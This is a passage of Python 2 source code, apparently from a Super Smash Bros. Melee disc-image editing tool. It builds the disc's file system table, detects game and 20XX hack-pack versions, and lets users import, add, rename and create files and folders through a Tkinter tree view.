if iid == gameId + '/sys': continue # Skip the system files
iidValues = Gui.isoFileTree.item( iid, 'values' )
if iidValues[1] == 'file': itemCount += 1
else:
# Search the inner folder, and add the totals of the children within to the current count.
itemCount += childItemCount( iid, gameId )
if iidValues[2] == 'native': itemCount += 1 # Counts folders only if they're originally from the ISO.
return itemCount
gameItemCount = childItemCount( rootIid, gameId ) + 1
entries = [ '0100000000000000' + "{0:0{1}X}".format( gameItemCount, 8 ) ] # Starts off with the root entry included.
stringTable = ['']
stringTableCharLen = 0
entryIndex = 1
def buildEntries( parentIid, stringTableCharLen, entryIndex, gameId ):
for iid in Gui.isoFileTree.get_children( parentIid ):
if iid == gameId + '/sys': continue
_, entity, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( iid, 'values' ) # description, entity, isoOffset, fileSize, isoPath, source, data
# Get the directory flag
if entity == 'folder':
directoryFlag = '01'
hierarchicalOffset = "{0:0{1}X}".format( len( iid.split('/') ) - 2, 8 ) # This is actually entryIndexOfParent #tofix
length = "{0:0{1}X}".format( entryIndex + childItemCount( iid, gameId ) + 1, 8 ) # This will be the index of the next file that's not in this directory.
else:
directoryFlag = '00'
hierarchicalOffset = "{0:0{1}X}".format( int(isoOffset, 16), 8 ) # Formats the number in hex, and pads it with zeros to 8 characters.
length = "{0:0{1}X}".format( int(fileSize), 8 )
if entity == 'file' or isoOffset == 'native': # Add this entry if it's a file, or if it's a folder that was originally in the ISO.
# Get the offset for the name in the string table, and the name to add to the string table.
stringTableOffset = "{0:0{1}X}".format( stringTableCharLen, 6 )
name = ( isoPath.split('/')[-1] + '\x00').encode('hex')
# Add the current entry to the entries list and string section.
entries.append( directoryFlag + stringTableOffset + hierarchicalOffset + length )
stringTable.append( name )
stringTableCharLen += len( name ) / 2 # Need to count by bytes, not nibbles.
entryIndex += 1
# If this was a folder, build entries for the children it contains.
if directoryFlag == '01': stringTableCharLen, entryIndex = buildEntries( iid, stringTableCharLen, entryIndex, gameId )
return stringTableCharLen, entryIndex
# Collect the info needed to make a FST entry of the current item.
buildEntries( rootIid, stringTableCharLen, entryIndex, gameId )
return ''.join( entries ) + ''.join( stringTable )
def getFileTreeFiles( parentIid='' ): # Collect a list of all files in the file tree, and add up their total space used.
files = []
totalFileSize = 0
for iid in Gui.isoFileTree.get_children( parentIid ):
iidValues = Gui.isoFileTree.item( iid, 'values' )
if iidValues[1] == 'file':
files.append( iidValues )
totalFileSize += int( iidValues[3] )
else: # This is a folder
filesList, fileSizes = getFileTreeFiles( iid )
files.extend( filesList )
totalFileSize += fileSizes
return files, totalFileSize
#===================================#
# ~ ~ Secondary Disc Operations ~ ~ #
#===================================#
def discDetected( throwWarnings=True ):
if not globalDiscDetails['isoFilePath']:
if throwWarnings: msg( 'No disc image has been loaded.' )
return False
elif not os.path.exists( globalDiscDetails['isoFilePath'] ):
if throwWarnings:
updateProgramStatus( 'Disc Not Found' )
msg( "Unable to find the disc image. Be sure that the file path is "
"correct and that it hasn't been moved, renamed, or deleted.", 'Disc Not Found' )
return False
else: return True
def pathIsFromDisc( entryField ): # Checks if the DAT in the DAT Texture Tree tab was loaded from a disc image or is a standalone file.
fileDest = entryField.get().replace( '"', '' )
return ( ':' not in fileDest and Gui.isoFileTree.exists(fileDest.lower()) )
def checkMeleeVersion(): # Checks if the loaded disc is a copy of SSBM
isMelee = ''
if os.path.exists( globalDiscDetails['isoFilePath'] ):
gameId = globalDiscDetails['gameId'].lower()
dolData = getFileDataFromDiscTreeAsBytes( gameId + '/start.dol' )
if not dolData:
print 'The DOL file appears to be absent from the Disc File Tree!'
globalDiscDetails['isMelee'] = ''
return
# Check the DOL for a string of "Super Smash Bros. Melee"
ssbmStringBytes = bytearray()
ssbmStringBytes.extend( "Super Smash Bros. Melee" )
if dolData[0x3B78FB:0x3B7912] == ssbmStringBytes: isMelee = '02' # i.e. version 1.02 (most common; so checking for it first)
elif dolData[0x3B6C1B:0x3B6C32] == ssbmStringBytes: isMelee = '01' # i.e. version 1.01
elif dolData[0x3B5A3B:0x3B5A52] == ssbmStringBytes: isMelee = '00' # i.e. version 1.00
elif dolData[0x3B75E3:0x3B75FA] == ssbmStringBytes: isMelee = 'pal' # i.e. PAL
globalDiscDetails['isMelee'] = isMelee
def check20xxVersion( fstEntries=None, fstStrings=None ):
""" The version returned may be 3.02, 3.02.01, 3.03, BETA 01, BETA 02, BETA 03, BETA 04, 4.05, or higher future versions following the x.xx format.
Sets globalDiscDetails['is20XX'] to an empty string if the disc does not appear to be a version of 20XXHP. """
# Get the MnSlChr file (either from a root folder or disc file)
cssData = None
if fstEntries: # Dealing with a disc image file
i = 0
for entry in fstEntries[1:]: # Skips the first (root) entry.
if entry[1] == '1': # Skip folders
i += 1
continue
# Check if it's the CSS file
if fstStrings[i].startswith( 'MnSlChr.' ):
entryOffset = int( entry[8:16], 16 )
entryLength = int( entry[16:24], 16 )
# CSS data located. Retrieve it
with open( globalDiscDetails['isoFilePath'], 'rb') as isoBinary:
isoBinary.seek( entryOffset )
cssData = bytearray( isoBinary.read(entryLength) )
break
i += 1
else: # Dealing with a root folder, need to grab the file from the OS filesystem
# Look for the CSS file name
for item in os.listdir( globalDiscDetails['isoFilePath'] ):
if item.startswith( 'MnSlChr.' ):
cssFilePath = globalDiscDetails['isoFilePath'] + '\\' + item
with open( cssFilePath, 'rb') as cssFile:
cssData = bytearray( cssFile.read() )
break
# Make sure data was found
if not cssData: # CSS file not found
globalDiscDetails['is20XX'] = ''
return
# Check the file length of MnSlChr (the CSS); if it's abnormally larger than vanilla, it's 20XX post-v3.02
fileSize = toInt( cssData[:4] )
if fileSize > 0x3a2849: # Comparing against the vanilla file size.
# Isolate a region in the file that may contain the version string.
versionStringRange = cssData[0x3a4cd0:0x3a4d00]
# Create a bytearray representing "VERSION " to search for in the region defined above
versionBytes = bytearray.fromhex( '56455253494f4e20' ) # the hex for "VERSION "
versionStringPosition = findBytes( versionStringRange, versionBytes )
if versionStringPosition != -1: # The string was found
versionValue = versionStringRange[versionStringPosition+8:].split(b'\x00')[0].decode( 'ascii' )
if versionValue == 'BETA': # Determine the specific beta version; 01, 02, or 03 (BETA 04 identified separately)
firstDifferentByte = cssData[0x3a47b5]
if firstDifferentByte == 249 and hexlify( cssData[0x3b905e:0x3b9062] ) == '434f4445': # Hex for the string "CODE"
versionValue += ' 01'
elif firstDifferentByte == 249: versionValue += ' 02'
elif firstDifferentByte == 250: versionValue += ' 03'
else: versionValue = ''
elif versionValue == 'BETA04': versionValue = 'BETA 04'
globalDiscDetails['is20XX'] = versionValue
elif fileSize == 0x3a5301: globalDiscDetails['is20XX'] = '3.03'
elif fileSize == 0x3a3bcd: globalDiscDetails['is20XX'] = '3.02.01' # Source: https://smashboards.com/threads/the-20xx-melee-training-hack-pack-v4-05-update-3-17-16.351221/page-68#post-18090881
else: globalDiscDetails['is20XX'] = ''
elif cssData[0x310f9] == 0x33: # In vanilla Melee, this value is '0x48'
globalDiscDetails['is20XX'] = '3.02'
else: globalDiscDetails['is20XX'] = ''
def isRootFolder( folderPath, showError=True ):
""" Checks a given file/folder path to see if it's a disc root folder (i.e. a folder of files needed to build a disc).
Returns 3 values: Bool on whether the folder is a disc root folder, a string for the system files folder, and
a Bool on whether it's in the form output/used by GCRebuilder. """
if not os.path.isdir( folderPath ): return False, '', False
# Confirm existance of the system files folder (and confirm its name)
for sysFolder in [ 'System files', 'SystemFiles', '&&systemdata' ]:
if os.path.exists( folderPath + '/' + sysFolder ): break # sysFolder will now be the name of the system files folder
else: # loop above didn't break
if showError: msg( 'No system files were found!\n\nThey should be in a folder called "System files" (or "&&systemdata", if the disc was extracted using GC Rebuilder).' )
return False, '', False
# Check that all system files are present and accounted for before continuing.
missingSysFiles = []
gcrSystemFiles = False # The 'format' of the extracted files; i.e. whether the root was exported via DTW or GCR
for systemFile in [ 'boot.bin', 'bi2.bin', 'apploader.ldr', 'start.dol' ]:
fullPath = folderPath + '/' + sysFolder + '/' + systemFile
if not os.path.exists( fullPath ):
if systemFile.endswith( '.bin' ) and os.path.exists( folderPath + '/' + sysFolder + '/iso.hdr' ): # It's ok if boot.bin & bi2.bin don't exist if iso.hdr is available in their place
gcrSystemFiles = True
continue
missingSysFiles.append( systemFile )
if missingSysFiles:
if showError: msg( 'Warning! The following system files could not be found, and are necessary for building the disc:\n\n' + '\n'.join(missingSysFiles) )
return False, '', False
return True, sysFolder, gcrSystemFiles
def replaceFileInDisc( iid, newExternalFilePath, iidValues, orig20xxVersion, origMainBuildNumber ):
_, entity, isoOffset, fileSize, isoPath, _, _ = iidValues # description, entity, isoOffset, fileSize, isoPath, source, data
# Get the strings table of the original file
originalFileData = getFileDataFromDiscTreeAsBytes( iid=iid )
originalStringDict = parseStringTable( originalFileData )[2]
# Get the strings table of the new file
with open( newExternalFilePath, 'rb' ) as newFile:
newFileData = newFile.read()
newStringDict = parseStringTable( newFileData )[2]
# Get just the strings, and sort them so they're in the same order (we only care that the same ones exist)
origFileStrings = sorted( originalStringDict.values() )
newFileStrings = sorted( newStringDict.values() )
# Check that this is an appropriate replacement file by comparing the strings of the two files
if not origFileStrings == newFileStrings:
if not tkMessageBox.askyesno( 'Warning! File Mismatch', """The file you're """ + 'importing, "' + os.path.basename(newExternalFilePath) + """", does't appear """
'to be a valid replacement for "' + os.path.basename(isoPath) + '".\n\nAre you sure you want to do this?' ): return False
# If the file being imported is the CSS. Check if it's for the right game version
elif 'MnSelectChrDataTable' in newFileStrings:
if orig20xxVersion != '':
cssfileSize = os.path.getsize( newExternalFilePath )
proposed20xxVersion = globalDiscDetails['is20XX']
if proposed20xxVersion:
if 'BETA' in proposed20xxVersion: proposedMainBuildNumber = int( proposed20xxVersion[-1] )
else: proposedMainBuildNumber = int( proposed20xxVersion[0] )
else: proposedMainBuildNumber = 0
if orig20xxVersion == '3.02': pass # Probably all CSS files will work for this, even the extended 3.02.01 or 4.0x+ files
elif cssfileSize < 0x3A3BCD: # importing a vanilla CSS over a 20XX CSS
if not tkMessageBox.askyesno( 'Warning! 20XX File Version Mismatch', """The CSS file you're """ + 'importing, "' + os.path.basename(newExternalFilePath) + """", is for a standard """
'copy of Melee (or a very early version of 20XX), and will not natively work for post-v3.02 versions of 20XX. Alternatively, you can extract '
"textures from this file and import them manually if you'd like.\n\nAre you really sure you want to continue with this import?" ): return False
elif orig20xxVersion != proposed20xxVersion and origMainBuildNumber != proposedMainBuildNumber: # These are quite different versions
if not tkMessageBox.askyesno( 'Warning! 20XX File Version Mismatch', """The CSS file you're """ + 'importing, "' + os.path.basename(newExternalFilePath) + """", was not """
'designed for to be used with this version of 20XX and may not work. Alternatively, you can extract '
"textures from this file and import them manually if you'd like.\n\nAre you sure you want to continue with this import?" ): return False
# Import the file. The original fileSize value is intentionally preserved, for later comparison during the evaluation for saving.
Gui.isoFileTree.item( iid, values=('Ready to be replaced...', entity, isoOffset, fileSize, isoPath, 'path', newExternalFilePath), tags='changed' )
# If this is a character file and this is 20XX beyond version 3, generate new CSP trim colors for this costume (if the option is enabled)
filename = os.path.basename( iid ) # Checking iid because newExternalFilePath might be named something completely different than the standard naming convention
if generalBoolSettings['autoGenerateCSPTrimColors'].get() and candidateForTrimColorUpdate( filename, orig20xxVersion, origMainBuildNumber ):
generateTrimColors( fileIid=iid, autonomousMode=True )
return True
def candidateForTrimColorUpdate( filename, orig20xxVersion, origMainBuildNumber ):
# Check if this is an appropriate version of 20XX HP
if not orig20xxVersion or not ( origMainBuildNumber > 3 or 'BETA' in orig20xxVersion ):
return False
# Check that it's a character file (pl = Player)
elif filename[:2] != 'pl':
return False
# Check that this is a Left-alt or Right-alt file (latter condition is for Falcon's red alts)
elif filename[-4:] not in ( '.lat', '.rat' ) and filename[-6:] not in ( 'rl.usd', 'rr.usd' ):
return False
# Exclude Master Hand and Crazy Hand
elif filename[2:4] in ( 'mh', 'ch' ):
return False
return True
def importSingleIsoFile(): # i.e. replace an existing file in the disc
if not discDetected(): return
iidSelectionsTuple = Gui.isoFileTree.selection() # Will be an empty string if nothing is selected, or a tuple of iids
if not iidSelectionsTuple: msg( "Please select a file to replace." ) #\n\nIf you'd like to replace multiple files, "
#"use the 'Import Multiple Files' option in the Disc Operations menu." )
elif len( iidSelectionsTuple ) == 1:
iidValues = Gui.isoFileTree.item( iidSelectionsTuple[0], 'values' )
_, entity, _, _, isoPath, _, _ = iidValues # description, entity, isoOffset, fileSize, isoPath, source, data
if entity == 'file':
ext = os.path.splitext( iidSelectionsTuple[0] )[1]
# Set the default filetypes to choose from in the dialog box (the filetype dropdown)
fileTypeOptions = [ ('Texture data files', '*.dat *.usd *.lat *.rat'), ('Audio files', '*.hps *.ssm'),
('System files', '*.bin *.ldr *.dol *.toc'), ('Video files', '*.mth *.thp'), ('All files', '*.*') ]
for typeTuple in fileTypeOptions:
extensions = typeTuple[1].split()
if '*' + ext in extensions or ( typeTuple[0] == 'Texture data files' and ext[-2:] == 'at' ):
orderedFileTypes = [ typeTuple ]
break
else: orderedFileTypes = [ ('Same type', '*'+ext) ]
# Populate the rest of the possible types to choose from in the dialog box (the filetype dropdown)
for typeTuple in fileTypeOptions:
if typeTuple not in orderedFileTypes: orderedFileTypes.append( typeTuple )
# Prompt the user to choose a file to import
filePath = tkFileDialog.askopenfilename(
title="Choose a file to import.",
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
filetypes=orderedFileTypes ) # Should include the appropriate default file types first
if filePath:
# Update the default directory to start in when opening or exporting files.
settings.set( 'General Settings', 'defaultSearchDirectory', os.path.dirname(filePath) )
with open( settingsFile, 'w' ) as theSettingsFile: settings.write( theSettingsFile )
# Check if this is a version of 20XX, and if so, get its main build number
orig20xxVersion = globalDiscDetails['is20XX']
if orig20xxVersion:
if 'BETA' in orig20xxVersion: origMainBuildNumber = int( orig20xxVersion[-1] )
else: origMainBuildNumber = int( orig20xxVersion[0] )
else: origMainBuildNumber = 0
# Check that this is an appropriate replacement file, and if so, replace it
fileReplaced = replaceFileInDisc( iidSelectionsTuple[0], filePath, iidValues, orig20xxVersion, origMainBuildNumber )
if fileReplaced:
global unsavedDiscChanges
unsavedDiscChanges.append( '"' + isoPath.split('/')[-1] + '" to be replaced with "' + os.path.basename( filePath ) + '".' )
updateProgramStatus( 'File Replaced. Awaiting Save' )
else: msg( "Please choose a file to replace for this operation. If you'd like to add new files to this folder, choose 'Add File(s) to Disc'." )
else: msg( "When selecting files on the Disc File Tree to replace, please only select one file. If you'd like to replace multiple files, "
"use the 'Import Multiple Files' option in the Disc Operations menu." )
def importMultipleIsoFiles(): # i.e. replace multiple existing files in the disc
if not discDetected(): return
filepaths = tkFileDialog.askopenfilename(
title="Choose files to import.",
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
multiple=True,
filetypes=[ ('Texture data files', '*.dat *.usd *.lat *.rat'), ('Audio files', '*.hps *.ssm'),
('System files', '*.bin *.ldr *.dol *.toc'), ('Video files', '*.mth *.thp'), ('All files', '*.*') ]
)
if filepaths != '':
# Update the default directory to start in when opening or exporting files.
settings.set( 'General Settings', 'defaultSearchDirectory', os.path.dirname(filepaths[-1]) )
with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )
gameId = globalDiscDetails['gameId'].lower()
filesNotInIso = []
filesReadyForReplacement = 0
cspColorGenerationTempDisabled = False
# Check if this is a version of 20XX, and if so, get its main build number
orig20xxVersion = globalDiscDetails['is20XX']
if orig20xxVersion:
if 'BETA' in orig20xxVersion: origMainBuildNumber = int( orig20xxVersion[-1] )
else: origMainBuildNumber = int( orig20xxVersion[0] )
else: origMainBuildNumber = 0
# Offer to temporarily disable CSP Trim color generation if importing many files
if generalBoolSettings['autoGenerateCSPTrimColors'].get():
# Check if there are many character files being imported that would need CSP Trim color updates
totalTrimColorGenerations = 0
for filepath in filepaths:
filename = os.path.basename( filepath ).lower()
if candidateForTrimColorUpdate( filename, orig20xxVersion, origMainBuildNumber ):
totalTrimColorGenerations += 1
if totalTrimColorGenerations > 15: break # We've seen enough
if totalTrimColorGenerations > 15:
cspColorGenerationTempDisabled = tkMessageBox.askyesno( 'Skip CSP Trim Color Generation?',
"When importing many alternate character costume files, CSP Trim Color Generation for them all can take a little while. Would you like to temporarily disable "
"""the option "Auto-Generate CSP Trim Colors" for this operation?\n\nTip: The CSP Trim color data is stored in the MnSlChr (CSS) file, from 0x3A3C90 to """
"0x3A45E0. So if you'd like to move all of it from one game/file to another, simply open the file in a hex editor and copy that region to your new CSS file "
"(be sure you are overwriting, rather than inserting). Alternatively, you can use the names in the data table to help you do this for only specific characters." )
if cspColorGenerationTempDisabled: generalBoolSettings['autoGenerateCSPTrimColors'].set( False )
# Add the files to the file tree, check for pre-existing files of the same name, and prep the files to import
for filepath in filepaths: # Folder paths will be excluded by askopenfilename
fileName = os.path.basename( filepath ).replace( ' ', '_' ).replace( '-', '/' )
iid = gameId + '/' + fileName.lower()
if not Gui.isoFileTree.exists( iid ): filesNotInIso.append( fileName )
else:
# Update this file's treeview values
if replaceFileInDisc( iid, filepath, Gui.isoFileTree.item(iid, 'values'), orig20xxVersion, origMainBuildNumber ):
filesReadyForReplacement += 1
if filesReadyForReplacement > 0:
global unsavedDiscChanges
unsavedDiscChanges.append( str( filesReadyForReplacement ) + ' files ready to be replaced.' )
updateProgramStatus( 'Files Replaced. Awaiting Save' )
# Restore the CSP Color Generation option if it was temporarily disabled
if cspColorGenerationTempDisabled:
generalBoolSettings['autoGenerateCSPTrimColors'].set( True )
if filesNotInIso != []: cmsg( 'These files will be skipped, because they could not be found in the disc:\n\n' + '\n'.join(filesNotInIso) )
def determineNewEntryPlacement():
# Determine the location (parent, index, and a disc path) for the new file in the treeview
targetIid = Gui.isoFileTree.selection()
if targetIid:
targetIid = targetIid[-1] # Simply selects the lowest position item selected
_, entity, isoOffset, _, isoPath, _, _ = Gui.isoFileTree.item( targetIid, 'values' ) # description, entity, isoOffset, fileSize, isoPath, source, data
# Remove the last portion of the disc path if it's a file or Convenience Folder
if entity == 'file' or isoOffset == 'notNative': # The latter case means it's not originally part of the disc's file structure
isoPath = '/'.join( isoPath.split('/')[:-1] )
parent = Gui.isoFileTree.parent( targetIid )
index = Gui.isoFileTree.index( targetIid )
else:
parent = globalDiscDetails['gameId'].lower()
index = 'end'
isoPath = globalDiscDetails['gameId']
return parent, index, isoPath
def addFilesToIso(): # Adds files which did not previously exist in the disc to its filesystem
if not discDetected(): return
# Prompt for one or more files to add.
filepaths = tkFileDialog.askopenfilename(
title='Choose one or more files (of any format) to add to the disc image.',
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
multiple=True,
filetypes=[ ('All files', '*.*'), ('Texture data files', '*.dat *.usd *.lat *.rat'), ('Audio files', '*.hps *.ssm'),
('System files', '*.bin *.ldr *.dol *.toc'), ('Video files', '*.mth *.thp') ]
)
if filepaths:
origParent, index, origIsoPath = determineNewEntryPlacement()
if origParent == globalDiscDetails['gameId'].lower() + '/sys':
msg( 'Directories or files cannot be added to the system files folder.' )
return
firstItemAdded = ''
preexistingFiles = []
filenamesTooLong = []
# Add the files to the file tree, check for pre-existing files of the same name, and prep the files to import
for filepath in filepaths: # Folder paths will be excluded by askopenfilename
# Reset these values; they may have changed by the last file's path (for creating folders)
parent = origParent
isoPath = origIsoPath
# Get the new file's name and size
fileName = os.path.basename( filepath ).replace( ' ', '_' ).replace( '-', '/' )
fileNameOnly = fileName.split('/')[-1] # Will be no change from the original string if '/' is not present
fileSize = int( os.path.getsize(filepath) ) # int() required to convert the value from long to int
# Exclude files with filenames that are too long
if len( os.path.splitext(fileNameOnly)[0] ) >= 30:
filenamesTooLong.append( filepath )
continue
# Create folders that may be suggested by the filename (if these folders don't exist, the file won't either, so the file-existance check below this wont fail)
if '/' in fileName:
for folderName in fileName.split('/')[:-1]: # Ignore the last part, the file name
isoPath += '/' + folderName
iid = isoPath.lower()
if not Gui.isoFileTree.exists( iid ): Gui.isoFileTree.insert( parent, index, iid=iid, text=' ' + folderName,
values=('', 'folder', 'native', '', isoPath, 'iso', ''), image=Gui.imageBank('folderIcon') )
parent = iid
# Exclude files that already exist in the disc
isoPath += '/' + fileNameOnly
iid = isoPath.lower()
if Gui.isoFileTree.exists( iid ):
preexistingFiles.append( fileName )
continue
# Add the file
Gui.isoFileTree.insert( parent, index, iid=iid, text=' ' + fileNameOnly, values=('Adding to disc...', 'file', '0', fileSize, isoPath, 'path', filepath), tags='changed' )
if firstItemAdded == '': firstItemAdded = iid
if index != 'end': index += 1
# Notify the user of any excluded files
notifications = ''
if preexistingFiles: notifications += 'These files were skipped, because they already exist in the disc:\n\n' + '\n'.join(preexistingFiles)
if filenamesTooLong:
if notifications: notifications += '\n\n'
notifications += 'These files were skipped, because their file names are longer than 29 characters:\n\n' + '\n'.join(filenamesTooLong)
if notifications: msg( notifications )
# If any files were added, scroll to the newly inserted item (so it's visible to the user), and update the pending changes and program status
if firstItemAdded:
Gui.isoFileTree.see( firstItemAdded )
global unsavedDiscChanges
unsavedDiscChanges.append( str( len(filepaths) - len(preexistingFiles) ) + ' file(s) added to disc.' )
globalDiscDetails['rebuildRequired'] = True
updateProgramStatus( 'Files Added. Awaiting Save' )
def addDirectoryOfFilesToIso():
if not discDetected(): return
# Prompt for a directory to add files from.
directoryPath = tkFileDialog.askdirectory(
title='Choose a folder of files to add to the disc image.',
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
#parent=Gui.root,
mustexist=True )
if directoryPath:
parent, index, isoPath = determineNewEntryPlacement()
if parent == globalDiscDetails['gameId'].lower() + '/sys':
msg( 'Directories or files cannot be added to the system files folder.' )
return
# Make sure a folder by this name doesn't already exist
initialDirIid = parent + '/' + os.path.basename( directoryPath ).lower()
if Gui.isoFileTree.exists( initialDirIid ): # Once this is established, further iids attached to this will always be unique, so no further checks are required.
msg( 'A directory by this path and name already exists in the disc.' )
return
rootDir = os.path.dirname( directoryPath )
firstItemAdded = ''
foldersAdded = 0
filesAdded = 0
filenamesTooLong = []
# Recursively scan the given folder and subfolders, and add all directories and files to the file tree
for parentDir, listOfFolders, listOfFiles in os.walk( directoryPath ):
modifiedParentDir = parentDir.replace( '-', '_' ).replace( ' ', '_' )
modifiedDirName = os.path.basename( modifiedParentDir )
# Exclude folders with names that are too long (>=30 characters)
if len( modifiedDirName ) >= 30:
filenamesTooLong.append( parentDir )
continue
relHeirarchy = os.path.relpath( parentDir, start=rootDir ).replace( '\\', '/' )
thisFolderIsoPath = parent + '/' + relHeirarchy.replace( ' ', '_' ).replace( '-', '_' )
thisFolderParent = '/'.join( thisFolderIsoPath.split('/')[:-1] ).lower() # removes the last directory from the path
folderIid = thisFolderIsoPath.lower()
# Attempt to grab the folder icon image.
Gui.isoFileTree.insert( thisFolderParent, index, iid=folderIid, text=' ' + modifiedDirName, values=('Adding to disc...', 'folder', 'native', '', thisFolderIsoPath, 'iso', ''), image=Gui.imageBank('folderIcon'), tags='changed' )
if firstItemAdded == '': firstItemAdded = folderIid
foldersAdded += 1
# Add the files for this folder
for fileName in listOfFiles:
modifiedfileName = fileName.replace( '-', '_' ).replace(' ', '_')
# Exclude files with names that are too long (>=30 characters)
if len( os.path.splitext(fileName)[0] ) >= 30:
filenamesTooLong.append( parentDir + '/' + fileName )
continue
filePath = parentDir + '/' + fileName
fileSize = os.path.getsize( filePath )
isoPath = thisFolderIsoPath + '/' + modifiedfileName
Gui.isoFileTree.insert( folderIid, 'end', iid=isoPath.lower(), text=' ' + modifiedfileName, values=('Adding to disc...', 'file', '0', fileSize, isoPath, 'path', filePath), tags='changed' )
filesAdded += 1
if index != 0: index = 0 # This may only be non-zero for the very first root folder that is being added
# Notify the user of any skipped items
if filenamesTooLong: msg( 'These files were skipped, because their file names are longer than 29 characters:\n\n' + '\n'.join(filenamesTooLong) )
Gui.isoFileTree.see( firstItemAdded ) # Scrolls to the newly inserted items, so it's visible to the user.
global unsavedDiscChanges
unsavedDiscChanges.append( str(foldersAdded) + ' folders and ' + str(filesAdded) + ' files added to disc, from ' + rootDir + '.')
globalDiscDetails['rebuildRequired'] = True
updateProgramStatus( 'Items Added. Awaiting Save' )
def createDirectoryInIso():
if not discDetected(): return
# Determine the location (parent and index) for the directory in the treeview. Also need the isoPath, which is the item's case-preserved path
targetIid = Gui.isoFileTree.selection()
if targetIid:
targetIid = targetIid[-1] # Simply selects the lowest position item selected
_, entity, _, _, isoPath, _, _ = Gui.isoFileTree.item( targetIid, 'values' ) # description, entity, isoOffset, fileSize, isoPath, source, data
if entity == 'folder':
parent = targetIid
index = 0
else:
isoPath = '/'.join( isoPath.split('/')[:-1] ) # removes the filename portion of the path
parent = isoPath.lower()
index = Gui.isoFileTree.index( targetIid )
if parent == globalDiscDetails['gameId'].lower() + '/sys':
msg( 'Directories or files cannot be added to the system files folder.' )
return
else:
isoPath = globalDiscDetails['gameId']
parent = isoPath.lower()
index = 'end'
if not Gui.isoFileTree.exists( parent ):
msg( 'Unable to determine a target location for the new directory. Please first choose an existing item as a reference point.' )
return
# Prompt the user to enter a name for the directory; validate it, and parse it for a full path, if given
nameChecksOut = False
while not nameChecksOut:
newIsoPath = isoPath
iid = ''
popupWindow = PopupEntryWindow( Gui.root, message='Enter a name for the directory:\n(Both absolute and relative paths are acceptable.)', width=50 )
dirName = popupWindow.entryText.replace( '"', '' )
if dirName == '': break
# If the directory appears to be a full path, re-determine the parent directory
if '\\' in dirName: msg( 'Please only use forward slashes ("/") when supplying an absolute path.' )
else:
for char in [ '-', '\\', ':', '*', '?', '<', '>', '|', ' ', '\n', '\t' ]:
if char in dirName:
msg( 'Spaces, line breaks, and the following characters may not be included in the path name: \t - \\ : * ? < > |' )
break
else: # if the above loop didn't break (meaning an invalid character wasn't found)
if '/' in dirName:
pathParts = dirName.split( '/' )
newIsoPath = '/'.join( pathParts[:-1] ) # removes the last portion (the new directory name) from the path
parent = newIsoPath.lower()
dirName = pathParts[-1]
if not Gui.isoFileTree.exists( parent ):
msg( 'Unable to locate the parent folder. please double-check that the path is correct.' )
continue
if len( dirName ) >= 30:
msg( 'Directory names must be less than 30 characters in length.' )
continue
newIsoPath += '/' + dirName
iid = newIsoPath.lower()
if Gui.isoFileTree.exists( iid ): msg( 'This directory already exists. Please enter a different name.' )
else: nameChecksOut = True
if iid and dirName:
Gui.isoFileTree.insert( parent, index, iid=iid, text=' ' + dirName, values=('Adding to disc...', 'folder', 'native', '', newIsoPath, 'iso', ''), image=Gui.imageBank('folderIcon'), tags='changed' )
Gui.isoFileTree.see( iid ) # Scrolls to the newly inserted item, so it's visible to the user.
global unsavedDiscChanges
unsavedDiscChanges.append( 'Folder, "' + dirName + '", added to disc.')
globalDiscDetails['rebuildRequired'] = True
updateProgramStatus( 'Folder Added. Awaiting Save' )
def renameItem():
if not discDetected(): return
iidSelectionsTuple = Gui.isoFileTree.selection()
if not iidSelectionsTuple: msg( 'Please select an item to rename.' )
elif len( iidSelectionsTuple ) > 1: msg( 'Please only select one item to rename.' )
else:
originalIid = iidSelectionsTuple[0]
description, entity, isoOffset, fileSize, isoPath, source, data = Gui.isoFileTree.item( originalIid, 'values' )
originalName = isoPath.split('/')[-1]
parent = Gui.isoFileTree.parent( originalIid )
index = Gui.isoFileTree.index( originalIid )
# Make sure this isn't a system file/folder
systemFileFolder = globalDiscDetails['gameId'].lower() + '/sys'
if originalIid == systemFileFolder or Gui.isoFileTree.parent( originalIid ) == systemFileFolder:
msg( 'System files and the system files folder cannot be renamed.' )
return
# Prompt the user to enter a new name, and validate it
nameChecksOut = False
while not nameChecksOut:
newIid = ''
popupWindow = PopupEntryWindow( Gui.root, message='Enter a new name:', defaultText=originalName, width=30 )
newName = popupWindow.entryText.replace( '"', '' )
if newName == '': break
# If the directory appears to be a full path, re-determine the parent directory
if len( newName ) > 30: msg( 'Please specify a name less than 30 characters in length.' )
else:
for char in [ '-', '/', '\\', ':', '*', '?', '<', '>', '|', ' ', '\n', '\t' ]:
if char in newName:
msg( 'Spaces, line breaks, and the following characters may not be included in the name: \t - / \\ : * ? < > |' )
break
else: # if the above loop didn't break (meaning an invalid character wasn't found)
newIsoPath = '/'.join( isoPath.split('/')[:-1] ) + '/' + newName
newIid = newIsoPath.lower()
if Gui.isoFileTree.exists( newIid ): msg( 'This item already exists. Please enter a different name.' )
else: nameChecksOut = True
if newName:
Gui.isoFileTree.delete( originalIid )
Gui.isoFileTree.insert( parent, index, iid=newIid, text=' ' + newName, values=(description, entity, isoOffset, fileSize, newIsoPath, source, data), tags='changed' )
Gui.isoFileTree.selection_set( newIid )
Gui.isoFileTree.focus( newIid )
# Create a new FST and write it into the disc
fstIid = globalDiscDetails['gameId'].lower() + '/game.toc'
description, entity, isoOffset, fileSize, isoPath, source, data = Gui.isoFileTree.item( fstIid, 'values' )
Gui.isoFileTree.item( fstIid, values=('Modified with a renamed entry', entity, isoOffset, fileSize, isoPath, 'ram', generateFST()), tags='changed' ) # Just changing the last two values
global unsavedDiscChanges
unsavedDiscChanges.append( originalName + ' renamed to ' + newName + '.' )
updateProgramStatus( 'Item Renamed. Awaiting Save' )
def getTotalItems( parentIid='' ): # Gets file and folder counts for items within the given parent item (recursively).
if Gui.isoFileTree.item( parentIid, 'values' )[1] == 'file': return 1, 0
else:
totalFiles = 0
totalFolders = 1
for iid in Gui.isoFileTree.get_children( parentIid ):
if Gui.isoFileTree.item( iid, 'values' )[1] == 'file': totalFiles += 1
else: # This is a folder
subfolderFiles, subfolderFolders = getTotalItems( iid )
totalFiles += subfolderFiles
totalFolders += subfolderFolders
return totalFiles, totalFolders
def removeItemsFromIso():
if not discDetected(): return
# Remove the selected items from the file tree
totalFilesRemoved = 0
totalFoldersRemoved = 0
